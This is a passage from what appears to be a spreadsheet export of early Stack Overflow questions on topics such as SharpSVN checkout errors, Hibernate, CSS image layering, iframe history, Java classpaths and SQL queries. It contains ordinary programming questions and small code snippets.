    <t>Getting an error while attempting to checkout with SharpSVN</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;While attempting to use the following code, I am receiving the following error : Already working for different url, error code 155000.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;string targetPath = @"C:\Documents and Settings\Admin\My Documents\CPM Creator\"; //" for prettify
client.Authenticatioâ€‹n.DefaultCredentialsâ€‹ = new NetworkCredential("guestUser", "hjk$#&amp;amp;123");
// Checkout the code to the specified directory
client.CheckOut(new Uri("http://svn.peerlis.com:8080/CPM Creator"), targetPath);
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>What's all this business about Flash, Flex, Adobe Air, Java FX and Silverlight?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What's all this business about Flash, Flex, Adobe Air, Java FX and Silverlight? Why would I choose one over the other? and what happened to Java Applets and ActiveX controls?&lt;/p&gt;
&lt;p&gt;Oh, and where does AJAX fit in to all this? and is Laszlo relevant?&lt;/p&gt;
&lt;p&gt;Afteredit (in response to some "d'uh" type answers): the question is a bit tongue-in-cheek. I know about the various RIA technologies. I am, however, interested in the StackOverflow community's opinion about each - particularly why you would use one over the other&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Sample Hibernate program?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How would I write a simple program using Hibernate in Java, with MySQL as a backend?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What are the major differences between Rails 1.X and 2.X</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Most dead-tree books and web tutorials address Rails 1.X.  I'm wondering if they are worth using to learn Rails 2.X.  If so, what sections and concepts should I avoid and what have pretty much stayed the same?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Best practice for managing data-model changes in a released system</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am about to embark on the development of a web application project.&lt;/p&gt;
&lt;p&gt;I'd like to get something up early and often for early adopters to play with and feedback.&lt;/p&gt;
&lt;p&gt;But I envisage the data model changing as the project progresses and my understanding of the system improves. &lt;/p&gt;
&lt;p&gt;How should I manage the dilemma of updating the data model appropriately and preventing data loss for early adopters? Should I simply put up a big warning saying "user beware", or should I put in the effort to create migration scripts?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Testing C code using the web</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a number of C functions which implement mathematical formulae.  To-date these have been tested for mathematical "soundness" by passing parameters through command line applications or compiling DLL's for applications like Excel.  Is there an easy way of doing this testing over the web?&lt;/p&gt;
&lt;p&gt;Ideally something along the lines of:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;compile a library&lt;/li&gt;
&lt;li&gt;spend five minutes defining a web form which calls this code&lt;/li&gt;
&lt;li&gt;testers can view the webpage, input parameters and review the output&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;A simple example of a calculation could be  to calculate the "accrued interest" of a bond:&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Inputs&lt;/strong&gt;: current date, maturity date, coupon payment frequency (integer), coupon amount (double)&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Outputs&lt;/strong&gt;: the accrued interest (double)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I create an instance of an arbitrary Array type at runtime?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to deserialize an array of an type unknown at compile time. At runtime I've discovered the type, but I don't know how to create an instance.&lt;/p&gt;
&lt;p&gt;Something like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Object o = Activator.CreateInstance(type);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;which doesn't work because there is no parameterless constructor, Array doesn't seem to have any constructor.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>layer hit test only returning layer when bottom half of layer is touched</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a sublayer on a layer-backed view.  The sublayer's contents are set to an Image Ref and is a 25x25 rect.&lt;br /&gt;
I perform a hit test on the super layer when the touchesBegan and touchesMoved methods are invoked. The hit test method does, in fact, return the sublayer if it is touched, BUT only if the bottom half of the image is touched.  If the top half of the image is touched, it returns the superlayer instead.&lt;/p&gt;
&lt;p&gt;I do know the iPhone OS compensates for the tendancy of user touches to be lower than intended.  Even if I resize the sublayer to a larger size, 50x50, it exhibits the same behavior.&lt;/p&gt;
&lt;p&gt;Any thoughts?   &lt;/p&gt;
</t>
  </si>
  <si>
    <t>What ASP.NET Web Controls implement IPostBackDataHandler?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Could someone point me to a list of controls that implement &lt;code&gt;IPostBackDataHandler&lt;/code&gt;?&lt;/p&gt;
&lt;p&gt;I want to know what controls implement this interface and what properties the controls will set during the &lt;code&gt;Postback&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;For example:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;Textbox : Text&lt;/p&gt;
  &lt;p&gt;DropDownList : SelectedIndex&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I'm basically looking for a list of properties that will not be saved in &lt;code&gt;ViewState&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Preventive vs Reactive C# programming</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've always been one to err on the side of preventing exception conditions by never taking an action unless I am certain that there will be no errors.  I learned to program in C and this was the only way to really do things.&lt;/p&gt;
&lt;p&gt;Working with C# I frequently see more reactive programing - try to do something and handle exceptions.  To me this seems like using exceptions as control statements.  The first few times I saw this I dismissed it as bad practice.  But over the past few months I've seen it all over the place and just have to wonder - is this accepted/efficient or just an epidemic?&lt;/p&gt;
&lt;p&gt;Update:
For a bit of clarification most of the exception handling I am seeing is things like&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;try
{
    //open file
}
catch
{
    //message box for file not found
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;or even worse&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;try
{
    //open xml
    //modify xml (100+ lines of code)
}
catch
{
    //message for 'unspecified error'
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I understand there are times when exception handling is very good to use (such as database connections) but I'm referring to the use of exceptions in place of more 'traditional' control.  I asked this because I felt like this programming style was using exceptions as a crutch instead of as a recovery method and wanted to know if this was just something I'd have to learn to expect in the C# world.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Display os x window full screen on secondary monitor using Cocoa</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm working on a Cocoa Mac app where I need to display a window/view on a secondary monitor, full-screen.  I know how to create a window that could be dragged onto the secondary monitor, but I was wanting to programatically create the window and make it full screen on the external monitor.  Thanks for the help.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>high cpu in IIS</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm developing a POS application that has a local database on each POS computer, and communicates with the server using WCF hosted in IIS. The application has been deployed in several customers for over a year now.&lt;/p&gt;
&lt;p&gt;About a week ago, we've started getting reports from one of our customers that the server that the IIS is hosted on is very slow. When I've checked the issue, I saw the application pool with my process rocket to almost 100% cpu on an 8 cpu server.&lt;/p&gt;
&lt;p&gt;I've checked the SQL Activity Monitor and network volume, and they showed no significant overload beyond what we usually see.&lt;/p&gt;
&lt;p&gt;When checking the threads in Process Explorer, I saw lots of threads repeatedly calling CreateApplicationContext. I've tried installing .Net 2.0 SP1, according to some posts I found on the net, but it didn't solve the problem and replaced the function calls with CLRCreateManagedInstance.&lt;/p&gt;
&lt;p&gt;I'm about to capture a dump using adplus and windbg of the IIS processes and try to figure out what's wrong.&lt;/p&gt;
&lt;p&gt;Has anyone encountered something like this or has an idea which directory I should check ?&lt;/p&gt;
&lt;p&gt;p.s. The same version of the application is deployed in another customer, and there it works just fine. I also tried rolling back versions (even very old versions) and it still behaves exactly the same.&lt;/p&gt;
&lt;p&gt;Edit: well, problem solved, turns out I've had an SQL query in there that didn't limit the result set, and when the customer went over a certain number of rows, it started bogging down the server. Took me two days to find it, because of all the surrounding noise in the logs, but I waited for the night and took a dump then, which immediately showed me the query.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Expression Web: Shortcut doesn't point to an exe file, but I want to use it to edit</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;&lt;strong&gt;Problem:&lt;/strong&gt; I have to support users who need to edit web pages. Some of these web pages exist only as textarea controls. Fortunately, there is a firefox plugin that allows the user to open the textarea in a default text editor. Unfortunately, this plugin requires you to point to the EXE file of the text editor you want to invoke.&lt;/p&gt;
&lt;p&gt;This is a reasonable requirement, but @#$%^ Microsoft Expression Web is one of those applications whose shortcut .lnk file does not appear to point to a real EXE file. If there is an EXE file somewhere, it's hidden.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Question:&lt;/strong&gt;
How can I locate the actual EXE file so people can configure Microsoft Expression web to be their editor of choice?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Update:&lt;/strong&gt; I should have emphasized that I was looking for a way to automate this via script or batch file (hence the SO posting, in case anyone's "not-programming-related" spidey sense was tingling).&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Converting GUID to Integer and Back</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;so I have a 3rd party application that I have to interface with, this application needs the userID from my users table.  the problem is that I store my userIDs as GUIDs and the 3rd party app only accepts an integer. so I figure, if there is a way to convert a GUID to an integer then be able to convert it back (as i get communications from their server regarding the userID) then I don't have to recode a too much.  any ideas?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I Change the FontFamily on a ContentPresenter?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a custom template for an expander that is close to the code below. I had to change some of the code to take out custom classes, brushes, etc..&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;Style TargetType="{x:Type Expander}"&amp;gt;
  &amp;lt;Setter Property="HorizontalContentAlignment"
          Value="Stretch" /&amp;gt;
  &amp;lt;Setter Property="VerticalContentAlignment"
          Value="Top" /&amp;gt;
  &amp;lt;Setter Property="BorderBrush"
          Value="Transparent" /&amp;gt;
  &amp;lt;Setter Property="FontFamily"
          Value="Tahoma" /&amp;gt;
  &amp;lt;Setter Property="FontSize"
          Value="12" /&amp;gt;
  &amp;lt;Setter Property="Foreground"
          Value="Black" /&amp;gt;
  &amp;lt;Setter Property="BorderThickness"
          Value="1" /&amp;gt;
  &amp;lt;Setter Property="Margin"
          Value="2,0,0,0" /&amp;gt;
  &amp;lt;Setter Property="Template"&amp;gt;
    &amp;lt;Setter.Value&amp;gt;
      &amp;lt;ControlTemplate TargetType="{x:Type Expander}"&amp;gt;
        &amp;lt;Border x:Name="Border"
                SnapsToDevicePixels="true"
                Background="White"
                BorderBrush="{TemplateBinding BorderBrush}"
                BorderThickness="{TemplateBinding BorderThickness}"
                Margin="0,0,0,10"
                Padding="0"
                CornerRadius="8"&amp;gt;
          &amp;lt;DockPanel&amp;gt;
            &amp;lt;Border x:Name="HeaderSite"
                    Background="Blue"
                    CornerRadius="8"
                    Height="32"
                    DockPanel.Dock="Top"&amp;gt;
              &amp;lt;DockPanel&amp;gt;
                &amp;lt;ToggleButton Foreground="White"
                              HorizontalContentAlignment="{TemplateBinding HorizontalContentAlignment}"
                              VerticalContentAlignment="{TemplateBinding VerticalContentAlignment}"
                              Margin="0"
                              MinHeight="0"
                              MinWidth="0"
                              Padding="6,2,6,2"
                              IsChecked="{Binding Path=IsExpanded, Mode=TwoWay, RelativeSource={RelativeSource TemplatedParent}}"
                              DockPanel.Dock="Left"&amp;gt;
                &amp;lt;/ToggleButton&amp;gt;                
                &amp;lt;ContentPresenter SnapsToDevicePixels="True"
                                  HorizontalAlignment="Left"
                                  Margin="4,0,0,0"
                                  ContentSource="Header"
                                  VerticalAlignment="Center"
                                  RecognizesAccessKey="True" /&amp;gt;
              &amp;lt;/DockPanel&amp;gt;
            &amp;lt;/Border&amp;gt;
            &amp;lt;Border x:Name="InnerBorder"
                    Margin="0" &amp;gt;
              &amp;lt;ContentPresenter Focusable="false"
                                Visibility="Collapsed"
                                HorizontalAlignment="{TemplateBinding HorizontalContentAlignment}"
                                Margin="{TemplateBinding Padding}"
                                x:Name="ExpandSite"
                                VerticalAlignment="{TemplateBinding VerticalContentAlignment}"
                                DockPanel.Dock="Bottom" /&amp;gt;
            &amp;lt;/Border&amp;gt;
          &amp;lt;/DockPanel&amp;gt;
        &amp;lt;/Border&amp;gt;
        &amp;lt;ControlTemplate.Triggers&amp;gt;
          &amp;lt;Trigger Property="IsExpanded"
                   Value="true"&amp;gt;
            &amp;lt;Setter Property="Margin"
                    TargetName="InnerBorder"
                    Value="5" /&amp;gt;           
            &amp;lt;Setter Property="Visibility"
                    TargetName="ExpandSite"
                    Value="Visible" /&amp;gt;
          &amp;lt;/Trigger&amp;gt;
          &amp;lt;Trigger Property="IsEnabled"
                   Value="false"&amp;gt;
            &amp;lt;Setter Property="Foreground"
                    Value="{DynamicResource {x:Static SystemColors.GrayTextBrushKey}}" /&amp;gt;
          &amp;lt;/Trigger&amp;gt;         
        &amp;lt;/ControlTemplate.Triggers&amp;gt;
      &amp;lt;/ControlTemplate&amp;gt;
    &amp;lt;/Setter.Value&amp;gt;
  &amp;lt;/Setter&amp;gt;
&amp;lt;/Style&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;As you can see there are two ContentPresenters. I would like the first one to use Tahoma Bold as the font instead of the default Tahoma. How can I do this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>"Brokered definition set" design pattern -- well-known under another name?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In a project that I've been involved with for many years, I've gradually evolved a design pattern that's proven to be extremely useful for me.  I sometimes feel I should get a bit evangelical with it, but I'd be a bit embarrassed if I tried and found out that it was just my version of somebody's old hat.  I've dug through &lt;i&gt;Design Patterns&lt;/i&gt; looking for it in vain, and I haven't run across anyone else talking about it, but my search hasn't been exhaustive.&lt;/p&gt;
&lt;p&gt;The core idea is having a broker object that manages a set of definition objects, each definition object constituting a possible value of some complex property.  As an example, you might have Car, Plane, and Generator classes that all have an EngineType.  Car doesn't store its own EngineType object, it stores a reference key of some kind that states the kind of Engine it has (such as an integer or string ID).  When we want to look at properties or behavior of an EngineType, say WankelEngine, we ask the EngineTypeBroker singleton object for WankelEngine's definition object, passing it the reference key.  This object encapsulates whatever's interesting to know about EngineTypes, possibly simply being a property list but potentially having behavior loaded onto it as well.&lt;/p&gt;
&lt;p&gt;So what it's facilitating is a kind of shared, loosely-coupled aggregation, where many Cars may have a WankelEngine but there is only one WankelEngine definition object (and the EngineTypeBroker can replace that object, leveraging the loose coupling into enhanced runtime morphism).&lt;/p&gt;
&lt;p&gt;Some elements of this pattern as I use it (continuing to use EngineType as an example):&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;There are always IsEngineType(x) and EngineType(x) functions, for determining whether a given value is a valid reference key for an EngineType and for retrieving the EngineType definition object corresponding to a reference key, respectively.&lt;/li&gt;
&lt;li&gt;I always allow multiple forms of reference key for a given EngineType, always at least a string name and the definition object itself, more often than not an integer ID, and sometimes object types that aggregate an EngineType.  This helps with debugging, makes the code more flexible, and, in my particular situation, eases a lot of backward compatibility issues relative to older practices. (The usual way people used to do all this, in this project's context, was to define hashes for each property an EngineType might have and look up the properties by reference key.)&lt;/li&gt;
&lt;li&gt;Usually, each definition instance is a subclass of a general class for that definition type (i.e. WankelEngine inherits EngineType).  Class files for definition objects are kept in a directory like /Def/EngineType (i.e. WankelEngine's class would be /Def/EngineType/WankelEngine).  So related definitions are grouped together, and the class files resemble configuration files for the EngineType, but with the ability to define code (not typically found in configuration files).&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Some trivially illustrative sample pseudocode:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;class Car {
    attribute Name;
    attribute EngineTypeCode;
    object GetEngineTypeDef() {
        return EngineTypeBroker-&amp;gt;EngineType(this-&amp;gt;GetEngineTypeCode());
    }
    string GetDescription() {
        object def = this-&amp;gt;GetEngineTypeDef();
        return "I am a car called " . this-&amp;gt;GetName() . ", whose " .
            def-&amp;gt;GetEngineTypeName() . " engine can run at " .
            def-&amp;gt;GetEngineTypeMaxRPM() . " RPM!";
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;So, is there a name out there for this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there anyway to speed up SQL Server Management Objects traversal of a existing database?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm currently using SMO and C# to traverse databases to create a tree of settings representing various aspects of the two databases, then comparing these trees to see where and how they are different.&lt;/p&gt;
&lt;p&gt;The problem is, for 2 reasonably sized database, it takes almost 10mins to crawl them locally and collect table/column/stored procedure information I wish to compare.&lt;/p&gt;
&lt;p&gt;Is there a better interface then SMO to access databases in such a fashion?  I would like to not include any additional dependencies, but I'll take that pain for a 50% speed improvement.  Below is a sample of how I'm enumerating tables and columns.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;        Microsoft.SqlServer.Management.Smo.Database db = db_in;
        foreach (Table t in db.Tables)
        {
            if (t.IsSystemObject == false)
            {
                foreach (Column c in t.Columns)
                {
                }                    
            }
        }
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>More than a window in Processing</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is it even possible? Can you load more than one image and have them displayed in more than one window?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Jquery video tutorial resources</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there any place where I can find JQuery video tutorials from novice level to master level? The books I saw mostly assume you are very familiar with CSS syntax. If there is any video tutorial resource for CSS, that would be awesome too.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>ASP.net Ajax: Use Code behind function instead web service</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is it possible not to use web service for ASP.net ajax instead call code-behind function to fetch data?&lt;/p&gt;
&lt;p&gt;any example or link is much appericate.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Trace and Debug statements</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Im a little confused over how to use the .NET Trace and Debug classes.&lt;/p&gt;
&lt;p&gt;Why would you bother using Trace instead of Debug?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Trace.TraceError()
Trace.TraceInformation()
Trace.Assert()
Debug.WriteLine()
Debug.Assert()
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Also, I understand that Debug statements are ignored when your in Release config mode, but If trace statements apply all the time, how does this affect performance?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Working with large wsdl, can we trim it?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;My webservice provider give me a large WSDL file, but we are going to use only a few function inside.&lt;/p&gt;
&lt;p&gt;I believe that the large WSDL have negative impact to the application performance.&lt;/p&gt;
&lt;p&gt;We use the webservice in client appliction, &lt;strong&gt;startup time&lt;/strong&gt; and &lt;strong&gt;memory usage&lt;/strong&gt; are issues.
Large WSDL means that jax-ws will takes longer to do binding and will takes more memory for the stub class.&lt;/p&gt;
&lt;p&gt;Is is possible that we trim WSDL file to a lightweight version? Are there any tool for this purpose?&lt;/p&gt;
&lt;p&gt;I do not think my webservice provider will generate another WSDL for us. We may have to &lt;strong&gt;do it auto in the build script&lt;/strong&gt;.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Layering images in CSS - possible to put 2 images in same element?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Supposing I'm setting a background image for a web page in CSS like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;body    {
font-size: 62.5%; /* Resets 1em to 10px */
font-family: Verdana, Arial, Sans-Serif;
background-color: #9D5922;
color: #000;
margin-left: auto;
margin-right: auto;
margin: 0;
padding: 0; 
background: url(images/desk.gif) repeat bottom left;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Is there any way to layer a second image on top of the desk.gif within the body element itself, or is the only way to create a separate class and use the z axis?&lt;/p&gt;
&lt;p&gt;Sorry, it's a simpleminded question, but I've been trying to figure this out and though I haven't been able to make it work, I also haven't found a clear slapdown of the idea anywhere online... so, is there a way, or is this just a no can do?&lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Back Button with iFrames</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm using an iframe to display content that has links.  When the user clicks around in the iFrame and hits "back," it goes back in the iFrame.  This behavior is OK.  However, once they're back to the first page of the iFrame and they hit "back" again, the entire window is taken back to the previous page.  This is unwanted.&lt;/p&gt;
&lt;p&gt;To prevent this behavior, I've put a fake "back" button within the iFrame.  (In most cases this is bad UI, in this case, it works well).  I'd like this fake back button to only go back if the previous page is the iFrame's page -- not the entire page.  &lt;strong&gt;When they hit the fake back button in the iFrame, it should only move that iFrame back, nothing else.&lt;/strong&gt;  Is there a way to do this?  Does an iFrame get its own history object?&lt;/p&gt;
&lt;p&gt;Something that might be of benefit: the domain of the iFrame and the main window can be assumed to be distinct.  So, if it's possible to read the "global" history object, I can check to see if the previous page was mine by checking to see if the domain is mine.  If the domain is not mine, the fake back button will be hidden or not do anything.&lt;/p&gt;
&lt;p&gt;Help greatly appreciated, and happy holidays!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is it possible to "add" to classpath dynamically in java?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;pre&gt;&lt;code&gt;java -classpath ../classes;../jar;. parserTester
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;How can i get the functionality in the above command programmatically? Like, is it possible to run as:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;java parserTester
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and get the same result? I tried using URLClassLoader but it modifies the classpath and does not add to it.&lt;/p&gt;
&lt;p&gt;Thanx!&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;Thanks for the response Milhous. But that is what i am trying to do.. How is it possible to get the jar into the classpath first? I tried using a custom classloader too :(&lt;/p&gt;
&lt;p&gt;That works.. But sorry that i need to run it only as:
java parserTester
I would like to know if such a thing is possible???&lt;/p&gt;
&lt;p&gt;It needs to be so bcoz i have parserTester.java and .class in a separate folder. I need to retain the file structure. The parserTester makes use of a jar in a separate jar folder.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>About "AUTOMATIC TEXT SUMMARIZER (lingustic based)"</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am having "AUTOMATIC TEXT SUMMARIZER (linguistic approach)" as my final year project. I have collected enough research papers and gone through them. Still I am not very clear about the 'how-to-go-for-it' thing. Basically I found "AUTOMATIC TEXT SUMMARIZER (statistical based)" and found that it is much easier compared to my project. My project guide told me not to opt this (statistical based) and to go for linguistic based.&lt;/p&gt;
&lt;p&gt;Anyone who has ever worked upon or even heard of this sort of project would be knowing that summarizing any document means nothing but SCORING each sentence (by some approach involving some specific algos) and then selecting sentences having score more than threshold score. Now the most difficult part of this project is choosing the appropriate algorithm for scoring and later implementing it.&lt;/p&gt;
&lt;p&gt;I have moderate programming skills and would like to code in JAVA (because there I'll get lots of APIs resulting in lesser overheads). Now I want to know that for my project, what should be my approach and algos used. Also how to implement them.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Possible to generate an iPhone application automatically from another iPhone application?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;As title; is there any function that can achieve this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Batching in ADO.NET without DataAdapters</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is it possible to implement batching of multiple stored procedure calls (doing updates/deletes) in ADO.NET without resorting to DataAdapters?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Using Git in a Company?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;At my workplace we have one large Subversion repository which holds about 100 projects. Some projects use each other through svn:externals. Usually all people have read+write access to everything, but sometimes external people and interns have only restricted read/write access to some custom folders so they don't get our crown jewels.&lt;/p&gt;
&lt;p&gt;How would you structure this in git? Each Project its own repository? how can you reuse code? Can you somehow implement access rights?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Easiest way to move Outlook 2007 emails to GMail?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've decided to move completely away from my old POP3 email accounts and into GMail.&lt;/p&gt;
&lt;p&gt;I have a lot of archived mail in a Outlook 2007 .pst file.&lt;/p&gt;
&lt;p&gt;I know I could just forward them from Outlook, but then I would receive them as only one email with a lot of attachments in GMail?&lt;/p&gt;
&lt;p&gt;How can I move these into my GMail?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Camellia Ruby Computer Vision Library on OS X</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Has anyone had any luck getting the &lt;a href="http://camellia.sourceforge.net/" rel="nofollow"&gt;Camellia&lt;/a&gt; computer vision library to install on OS X? I've been banging my head against a wall trying to get it to install. There is &lt;a href="http://po-ru.com/diary/camellia-and-ruby-on-mac-os-x/" rel="nofollow"&gt;only one reference I can find&lt;/a&gt; online and it is a bit dated. I've followed the instructions to the T with no luck.&lt;/p&gt;
&lt;p&gt;I'm hoping one of your brilliant folks on SO can help a dude out.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to find the next record after a specified one in SQL?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'd like to use a single SQL query (in MySQL) to find the record which comes after one that I specify.&lt;/p&gt;
&lt;p&gt;I.e., if the table has:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;id, fruit
--  -----
1   apples
2   pears
3   oranges
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I'd like to be able to do a query like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SELECT * FROM table where previous_record has id=1 order by id;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;(clearly that's not real SQL syntax, I'm just using pseudo-SQL to illustrate what I'm trying to achieve)&lt;/p&gt;
&lt;p&gt;which would return:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;2, pears
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;My current solution is just to fetch all the records, and look through them in PHP, but that's slower than I'd like. Is there a quicker way to do it?&lt;/p&gt;
&lt;p&gt;I'd be happy with something that returned two rows -- i.e. the one with the specified value and the following row.&lt;/p&gt;
&lt;p&gt;EDIT: Sorry, my question was badly worded. Unfortunately, my definition of "next" is not based on ID, but on alphabetical order of fruit name. Hence, my example above is wrong, and should return oranges, as it comes alphabetically next after apples. Is there a way to do the comparison on strings instead of ids?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to version control, deploy and develop php and mySQL</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm working in a project where we develop php on Zend using a mySQL database and the project is about to get to a point where it will be necessary to use version control not only for the actual code but also for the database. &lt;/p&gt;
&lt;p&gt;Also we are getting a good production server (and the actual production server will be a test server). &lt;/p&gt;
&lt;p&gt;So i was wondering if you guys think its a good idea to standardize the IDE the programmers use and make them have a apache/php/mySQL installed in their boxes to test the code thus having a developers environment in each computer, a test server and a production server.&lt;/p&gt;
&lt;p&gt;If so, what set up would you recommend to each part of this process, especially mysql version control (I've never done that) and how to make the deployment?&lt;/p&gt;
&lt;p&gt;I know its a very big question and most have been answered in different questions, but I would like a global answer about how is the faster, better (harder and stronger) set-up for this and how much time would we have to stop programming to actually have all this working! (and yes, hiring an expert in the subject is pretty much a no-no)&lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Visual Source Safe - Removing files from web projects</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'll try to make this as straight forward as possible.&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Currently our team has a VSS database where our projects are stored.&lt;/li&gt;
&lt;li&gt;Developers grab the code and place on their localhost machine and develop locally.&lt;/li&gt;
&lt;li&gt;Designated developer grabs latest version and pushes to development server.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The problem is, when a file is removed from the project (by deleting it in VS2008) then the next time another developer (not the one who deleted it) checks in, it prompts them to check in those deleted files because they still have a copy on their local machine.&lt;/p&gt;
&lt;p&gt;Is there a way around this?  To have VSS instruct the client machine to remove these files and not prompt them to check back in?  What is the preferred approach for this?&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;Edit Note(s):&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;I agree SVN is better than VSS&lt;/li&gt;
&lt;li&gt;I agree Web Application project is better than Web Site project&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Problem&lt;/strong&gt;: This same thing happens with files which are removed from class libraries.&lt;/li&gt;
&lt;/ol&gt;
</t>
  </si>
  <si>
    <t>Can Microsoft Windows Workflow route to specific workstations?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to write a workflow application that routes a link to a document.  The routing is based upon machines not users because I don't know who will ever be at a given post.  For example, I have a form.  It is initially filled out in location A.  I now want it to go to location B and have them fill out the rest.  Finally, it goes to location C where a supervisor will approve it.  &lt;/p&gt;
&lt;p&gt;None of these locations has a known user.  That is I don't know who it will be.  I only know that whomever it is is authorized (they are assigned to the workstation and are approved to be there.)&lt;/p&gt;
&lt;p&gt;Will Microsoft Windows Workflow do this or do I need to build my own workflow based on SQL Server, IP Addresses, and so forth?&lt;/p&gt;
